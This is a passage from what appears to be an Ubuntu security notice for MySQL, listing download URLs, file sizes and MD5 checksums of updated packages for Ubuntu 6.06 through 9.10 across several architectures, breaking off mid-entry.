438c8f54ffe6c48e67444b4f4fe9e831\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n22-0ubuntu6.06.12_i386.deb Size/MD5: 21353338 aacc9a20e8a4dc73e54334af61e093d1\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.22-0ubuntu6.06.12_powerpc.deb Size/MD5: 6887098 \\\r\n933d514a51e9bdbd71e1892c510d5972 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.2 \\\r\n2-0ubuntu6.06.12_powerpc.deb Size/MD5: 1464520 cba00b39363cd2c84cd241cef114c146\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n22-0ubuntu6.06.12_powerpc.deb Size/MD5: 6945458 4d66c9c564888ed5083c5460d62571ff\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n22-0ubuntu6.06.12_powerpc.deb Size/MD5: 22708438 f0df7d903d21e30015719606277c331e\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.22-0ubuntu6.06.12_sparc.deb Size/MD5: 6435878 2fe1f669d28c49ecac247ff966da1d74\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.22-0ubuntu6.06.12_sparc.deb Size/MD5: 1436656 a4bc7daef42f56b4c7631979c1fb4205\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n22-0ubuntu6.06.12_sparc.deb Size/MD5: 6546076 cf3c1b3a58c5c751e505039effd2736b\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n22-0ubuntu6.06.12_sparc.deb Size/MD5: 21974626 0e5b525a96691d3846141872be033343\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51 \\\r\na-3ubuntu5.5.diff.gz Size/MD5: 339669 5d60913fc963e3e79d7359ad34e01d73\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51 \\\r\na-3ubuntu5.5.dsc Size/MD5: 1431 550486d7eb0d9bb0a16d9b6354c5ce63\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51 \\\r\na.orig.tar.gz Size/MD5: 17946664 6fae978908ad5eb790fa3f24f16dadba\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.51a- \\\r\n3ubuntu5.5_all.deb Size/MD5: 52524 255aa521be7f73f8609f8ff34e2d9cb2\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.51a- \\\r\n3ubuntu5.5_all.deb Size/MD5: 60760 029a306a41330da1162d8a6271903ea7\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.51a- \\\r\n3ubuntu5.5_all.deb Size/MD5: 54718 1c739e3d3ba80d59e84daa50bbc7b108\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.51a-3ubuntu5.5_amd64.deb Size/MD5: 7595714 aa4e4d10ffaeb884b689e31a1cef78f6\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.51a-3ubuntu5.5_amd64.deb Size/MD5: 1878318 e6f3c214a9a9dd43c7544c9d483c6dc8\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n51a-3ubuntu5.5_amd64.deb Size/MD5: 8243190 60fadf98f4a486a341d68e5fb64242f0\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n51a-3ubuntu5.5_amd64.deb Size/MD5: 28019550 2def1acb4f58487fe46354c07697f70f\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.51a-3ubuntu5.5_i386.deb Size/MD5: 7217088 a5c18f67da82686380e498164baf9eb8\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.51a-3ubuntu5.5_i386.deb Size/MD5: 1837214 75ed6085799e4c41404024e6b3b6cfb0\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n51a-3ubuntu5.5_i386.deb Size/MD5: 7827620 12f85552fbbb64e2345e732732973824\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n51a-3ubuntu5.5_i386.deb Size/MD5: 27429242 8f3a8be947c0fcceb832e6624e10b659\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-3u \\\r\nbuntu5.5_lpia.deb Size/MD5: 7161686 8597c58cf4965174975630dbb049485f\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-3ub \\\r\nuntu5.5_lpia.deb Size/MD5: 1827214 1aa581c6751818c4fe1f0ce6bfb18e6f\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-3ubunt \\\r\nu5.5_lpia.deb Size/MD5: 7841430 b289175e0013db05378e3f9cd427db65\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-3ubunt \\\r\nu5.5_lpia.deb Size/MD5: 27358930 45969231c1d332db54f738e36da39abe\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-3u \\\r\nbuntu5.5_powerpc.deb Size/MD5: 7588138 4f767c278a4ba51b5083fd9ae4374325\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-3ub \\\r\nuntu5.5_powerpc.deb Size/MD5: 1916056 d82c00070c1c0d9f4a58a7f1977eea62\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-3ubunt \\\r\nu5.5_powerpc.deb Size/MD5: 8242628 8482aeb1c190500043f9b9b74ca3328c\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-3ubunt \\\r\nu5.5_powerpc.deb Size/MD5: 28345180 75de60d6fac901c43e1c032b4c4ccdc8\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-3u \\\r\nbuntu5.5_sparc.deb Size/MD5: 7200904 de677b3281d476c8c2ab38858f055f51\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-3ub \\\r\nuntu5.5_sparc.deb Size/MD5: 1846732 27a62502a5dd87bbcdf917391ab3583f\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-3ubunt \\\r\nu5.5_sparc.deb Size/MD5: 7832466 39ee953d7ac9b1a3bb13a3ba6976a062\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-3ubunt \\\r\nu5.5_sparc.deb Size/MD5: 27644158 62d3802f26217949a10152c120491b92\r\n\r\nUpdated packages for Ubuntu 8.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.67 \\\r\n-0ubuntu6.1.diff.gz Size/MD5: 336351 a373771dfabdc93b4171d9478a36ea5a\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.67 \\\r\n-0ubuntu6.1.dsc Size/MD5: 1845 c2756cc5a230d0eeab3c766031df39c8\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.67 \\\r\n.orig.tar.gz Size/MD5: 18190615 3c868d130a0edf4c9dd1da64fe141975\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.67-0 \\\r\nubuntu6.1_all.deb Size/MD5: 53318 1910e22b6ab49e474b2173fe3355218c\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.67-0 \\\r\nubuntu6.1_all.deb Size/MD5: 61272 2da508710dafbd9a9b562cf8887f4b6b\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.67-0 \\\r\nubuntu6.1_all.deb Size/MD5: 55508 6abad70a6b59c6a682aadb36449ca324\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.67-0ubuntu6.1_amd64.deb Size/MD5: 7683166 3395c05fb294228283085ba373266e81\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.67-0ubuntu6.1_amd64.deb Size/MD5: 1877112 e9aa4cb777e27bcc82edaa3654313b47\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n67-0ubuntu6.1_amd64.deb Size/MD5: 8282998 739613274c6831eb3e2a1b3838f2defb\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n67-0ubuntu6.1_amd64.deb Size/MD5: 27449918 7bbfd1737acd0316f7fc98371b67959e\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.0.67-0ubuntu6.1_i386.deb Size/MD5: 7295910 c4a4b4ffa0e6d27b45c06bb2f82793b6\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5 \\\r\n.0.67-0ubuntu6.1_i386.deb Size/MD5: 1841126 9d2f4ec8c855eaf53097fc25d3b4ebdd\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0. \\\r\n67-0ubuntu6.1_i386.deb Size/MD5: 7882140 0628692852a8224ebedb2fc6c93ab0dc\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0. \\\r\n67-0ubuntu6.1_i386.deb Size/MD5: 26845390 f6837acba0ce00d6f47c7286873d9555\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.67-0ub \\\r\nuntu6.1_lpia.deb Size/MD5: 7238848 8453be364e88a877e637d20d76277e1c\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.67-0ubu \\\r\nntu6.1_lpia.deb Size/MD5: 1829966 efd8e067d658633086a22b689c18a0fb\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.67-0ubuntu \\\r\n6.1_lpia.deb Size/MD5: 7876470 c3321d38368f6f3cfc1b2f0943571c9d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.67-0ubuntu \\\r\n6.1_lpia.deb Size/MD5: 26771148 c0f9db9c9e5fcc35ab31961486466397\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.67-0ub \\\r\nuntu6.1_powerpc.deb Size/MD5: 7698848 a770ab25d31340131a7b6b00ae246654\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.67-0ubu \\\r\nntu6.1_powerpc.deb Size/MD5: 1886412 f4e50087f47afa8b2ff26b780f83cd73\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.67-0ubuntu \\\r\n6.1_powerpc.deb Size/MD5: 8233508 0ce915b511dfab829cd19cb5a13c199b\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.67-0ubuntu \\\r\n6.1_powerpc.deb Size/MD5: 27424328 fa89227e20fc7ca82539bbdbcdc47a0b\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.67-0ub \\\r\nuntu6.1_sparc.deb Size/MD5: 7216146 d35e071761c46fe5925fb899bc928bc7\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.67-0ubu \\\r\nntu6.1_sparc.deb Size/MD5: 1850628 9920dfdbcbb1bae208a3cf98ea939dc3\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.67-0ubuntu \\\r\n6.1_sparc.deb Size/MD5: 7843558 bc0ca5889cc4e548dfffdc36349c39d8\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.67-0ubuntu \\\r\n6.1_sparc.deb Size/MD5: 26978336 39ead5bdd637f37ecab2cdc9a80ff0f4\r\n\r\nUpdated packages for Ubuntu 9.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.1.30 \\\r\nreally5.0.75-0ubuntu10.3.diff.gz Size/MD5: 352203 0ec231929483bcf16d96cdb9b0f58c9f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.1.30 \\\r\nreally5.0.75-0ubuntu10.3.dsc Size/MD5: 1956 786a69531e3997a24963c2289c2f99a4\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.1.30 \\\r\nreally5.0.75.orig.tar.gz Size/MD5: 18275990 81153cfb1108f858446a69c6371fd9f3\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.1.30re \\\r\nally5.0.75-0ubuntu10.3_all.deb Size/MD5: 55530 065b5eb033ab08fc571597578111c6bd\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.1.30re \\\r\nally5.0.75-0ubuntu10.3_all.deb Size/MD5: 63400 526faed8d9ba168839a9d84aad4fc9d6\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.1.30re \\\r\nally5.0.75-0ubuntu10.3_all.deb Size/MD5: 57722 ff1439fc167590572fe8d655db49e1bc\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.1.30really5.0.75-0ubuntu10.3_amd64.deb Size/MD5: 7690120 \\\r\n6da2ea09e8edf8a3d768a8e3d1ea15a9 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.1.3 \\\r\n0really5.0.75-0ubuntu10.3_amd64.deb Size/MD5: 1879070 \\\r\n3fc7c0599b8324bd9fc22c5eefa3b976 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.1.30re \\\r\nally5.0.75-0ubuntu10.3_amd64.deb Size/MD5: 8292706 0cbea113abd4393a8ef2d0231578ce7f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.1. \\\r\n30really5.0.75-0ubuntu10.3_amd64.deb Size/MD5: 24014628 \\\r\n767d67b701b7461e77fa1d1977d11e1b \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-core-5.0_5.1 \\\r\n.30really5.0.75-0ubuntu10.3_amd64.deb Size/MD5: 3535012 \\\r\n0dc0c7f6f230c30aeda03e99d578653b\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_ \\\r\n5.1.30really5.0.75-0ubuntu10.3_i386.deb Size/MD5: 7299230 \\\r\nbaac628c664dfa1c699cc213a9c78fa6 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.1.3 \\\r\n0really5.0.75-0ubuntu10.3_i386.deb Size/MD5: 1843044 \\\r\n644c14b195edb5e34d8945ee407d2576 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.1.30re \\\r\nally5.0.75-0ubuntu10.3_i386.deb Size/MD5: 7879312 5158664029e5253233b9140b39a2df80\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.1. \\\r\n30really5.0.75-0ubuntu10.3_i386.deb Size/MD5: 23557588 \\\r\n90bd4333bd68fd47b530dca5dcc5eff4 \\\r\nhttp://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-core-5.0_5.1 \\\r\n.30really5.0.75-0ubuntu10.3_i386.deb Size/MD5: 3349320 \\\r\nd18278f2c4ef544a885e115006327c1e\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.1.30real \\\r\nly5.0.75-0ubuntu10.3_lpia.deb Size/MD5: 7240220 fa79ae81847f46dcd5d5daefa8a6c0f3\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.1.30reall \\\r\ny5.0.75-0ubuntu10.3_lpia.deb Size/MD5: 1831892 1e2464fce24ca6ea84345ca0978f49e0\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_lpia.deb Size/MD5: 7882476 63d25719b32f8656462d1fd25a18819d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_lpia.deb Size/MD5: 23479958 5343688fc3ef1a7ac6b59a6bcffd45fd\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-core-5.0_5.1.30rea \\\r\nlly5.0.75-0ubuntu10.3_lpia.deb Size/MD5: 3345432 14be7d779f4b5efabcbcddbb0d5a7acd\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.1.30real \\\r\nly5.0.75-0ubuntu10.3_powerpc.deb Size/MD5: 7692764 da0649e484302c6461ba8384121b91b2\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.1.30reall \\\r\ny5.0.75-0ubuntu10.3_powerpc.deb Size/MD5: 1883958 7f463f7d3b36f4681e3b808d737036d0\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_powerpc.deb Size/MD5: 8223568 7b96828c66e1120ffea61c84d2d2e838\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_powerpc.deb Size/MD5: 23969054 26a44c422051e7dd3f51bc85b59af8c6\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-core-5.0_5.1.30rea \\\r\nlly5.0.75-0ubuntu10.3_powerpc.deb Size/MD5: 3491954 \\\r\n7363ef1740d5de28a3a2fc99f87ed8cb\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.1.30real \\\r\nly5.0.75-0ubuntu10.3_sparc.deb Size/MD5: 7222702 4a0634e6d9cf1d39bd89c2c5487b573d\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.1.30reall \\\r\ny5.0.75-0ubuntu10.3_sparc.deb Size/MD5: 1850126 cab29baa81c69947373e3e4feb42feb4\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_sparc.deb Size/MD5: 7853078 557aa2180add88e17f4aeccca599af27\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.1.30really5. \\\r\n0.75-0ubuntu10.3_sparc.deb Size/MD5: 23770508 862006745adfc1d70475859390cad1b7\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.0/mysql-server-core-5.0_5.1.30rea \\\r\nlly5.0.75-0ubuntu10.3_sparc.deb Size/MD5: 3303030 0c42d41169e9f68a151fefef5c98808b\r\n\r\nUpdated packages for Ubuntu 9.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.37 \\\r\n-1ubuntu5.1.diff.gz Size/MD5: 324027 081acc52aeb607791ced32e325a75fd3\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.37 \\\r\n-1ubuntu5.1.dsc Size/MD5: 1882 46dbf831cc6b4780f2cd83413b5661c7\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-dfsg-5.1_5.1.37 \\\r\n.orig.tar.gz Size/MD5: 17814352 a472b99a174592f052c37042764fea3e\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16-dev_ \\\r\n5.1.37-1ubuntu5.1_all.deb Size/MD5: 64104 2d47dd54cebd480163fff113ce7b5506\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client_5.1.37-1 \\\r\nubuntu5.1_all.deb Size/MD5: 64164 dd07b397c640f1687e10272ffc5a247a\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-common_5.1.37-1 \\\r\nubuntu5.1_all.deb Size/MD5: 69956 0ae3bdd2851865960eb9742ffeba8f11\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server_5.1.37-1 \\\r\nubuntu5.1_all.deb Size/MD5: 64288 376ed64c975947bb287391bb1bcbe932\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5. \\\r\n1.37-1ubuntu5.1_amd64.deb Size/MD5: 2401434 41b7e469f1566b873d524bafda60e75e\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1. \\\r\n37-1ubuntu5.1_amd64.deb Size/MD5: 1959230 70a0ccab9e29f6bb5ef029d73fe8c3d4\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37- \\\r\n1ubuntu5.1_amd64.deb Size/MD5: 5664854 2e126e3a5d850d0361b25fc9e8808ef4\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37- \\\r\n1ubuntu5.1_amd64.deb Size/MD5: 4435352 8e6e88801c466891a9e07743729b6e0c\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1. \\\r\n37-1ubuntu5.1_amd64.deb Size/MD5: 8833598 0200fbf6745b2d4df5fe4638f33e6b6d\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1. \\\r\n37-1ubuntu5.1_amd64.deb Size/MD5: 7271574 f0d1d182a70af5e07d952633a966b22f\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1 \\\r\n_5.1.37-1ubuntu5.1_amd64.deb Size/MD5: 4125858 76802bd95972939cf2e21a2a317ca17e\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5. \\\r\n1.37-1ubuntu5.1_i386.deb Size/MD5: 2331504 f0e7160d445f086438227ed6f7814c4e\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1. \\\r\n37-1ubuntu5.1_i386.deb Size/MD5: 1903424 d38f149b1c062dd900a379a34d4071a0\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37- \\\r\n1ubuntu5.1_i386.deb Size/MD5: 5430754 545a105ae29b719b39fb27e3442e0775\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37- \\\r\n1ubuntu5.1_i386.deb Size/MD5: 4208940 52feb3c648a6466bd1fc5735f50dbb89\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1. \\\r\n37-1ubuntu5.1_i386.deb Size/MD5: 8202316 f10965dd8477b55363b4d9f82395fcd5\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1. \\\r\n37-1ubuntu5.1_i386.deb Size/MD5: 7186322 6aa11525e264e48f16c6b89ea6a738f7\r\n http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1 \\\r\n_5.1.37-1ubuntu5.1_i386.deb Size/MD5: 3838568 337f04d464f77fe992fa8e69489b9748\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubun \\\r\ntu5.1_lpia.deb Size/MD5: 2320962 06e64a478b4ede2470771fac26342064\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu \\\r\n5.1_lpia.deb Size/MD5: 1904468 1b01e357d6445da62ba0a8f888800269\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.1 \\\r\n_lpia.deb Size/MD5: 5396228 7bb5585662b0883cb817fd0c8169bb84\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-pic_5.1.37-1ubuntu5.1 \\\r\n_lpia.deb Size/MD5: 4179966 c6ad5137f34df27156f09520980f2e6c\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-client-5.1_5.1.37-1ubuntu \\\r\n5.1_lpia.deb Size/MD5: 8189810 151ed5d123d9ac50558cbc6b83b6a6ee\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-5.1_5.1.37-1ubuntu \\\r\n5.1_lpia.deb Size/MD5: 7196610 3134ca1a858bc6d9a4d810b0b782d8e5\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/mysql-server-core-5.1_5.1.37-1u \\\r\nbuntu5.1_lpia.deb Size/MD5: 3826714 9b7e7469d2744da817fde75fdf6d8917\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient-dev_5.1.37-1ubun \\\r\ntu5.1_powerpc.deb Size/MD5: 2417938 6b29433aaa8e8cabd380e005d4cfea58\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqlclient16_5.1.37-1ubuntu \\\r\n5.1_powerpc.deb Size/MD5: 1934354 6e8274c6d42fdfdcf61198c8741a24cc\r\n http://ports.ubuntu.com/pool/main/m/mysql-dfsg-5.1/libmysqld-dev_5.1.37-1ubuntu5.1 \\\r\n_powerpc.deb Size/MD5: 5627838 